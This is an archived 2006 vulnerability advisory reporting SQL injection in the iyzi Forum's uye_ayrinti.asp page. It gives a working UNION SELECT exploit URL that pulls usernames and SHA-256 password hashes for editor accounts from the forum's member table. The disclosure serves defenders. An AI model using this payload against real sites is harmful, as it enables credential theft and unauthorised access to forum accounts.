iyzi Forum s1 b2 (tr) SQL Injection Vulnerability

2006-09-25T00:00:00
ID SECURITYVULNS:DOC:14411
Type securityvulns
Reporter Securityvulns
Modified 2006-09-25T00:00:00

Description

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + iyzi Forum s1 b2 (tr) SQL Injection Vulnerability + + Author : Fix TR + + Site : www.hack.gen.tr + + Contact : fixtr[at]bsdmail.com + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Download & Info: http://www.aspindir.com/Goster/2981 Bug In : uye_ayrinti.asp Risk : High

Exp: http://[victim]/[path]/uye/uye_ayrinti.asp?uye_nu=1+union+select+1,kullanici_adi,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null+from+iyzi_uyeler+where+editor+like+1

Password encrytped with SHA-256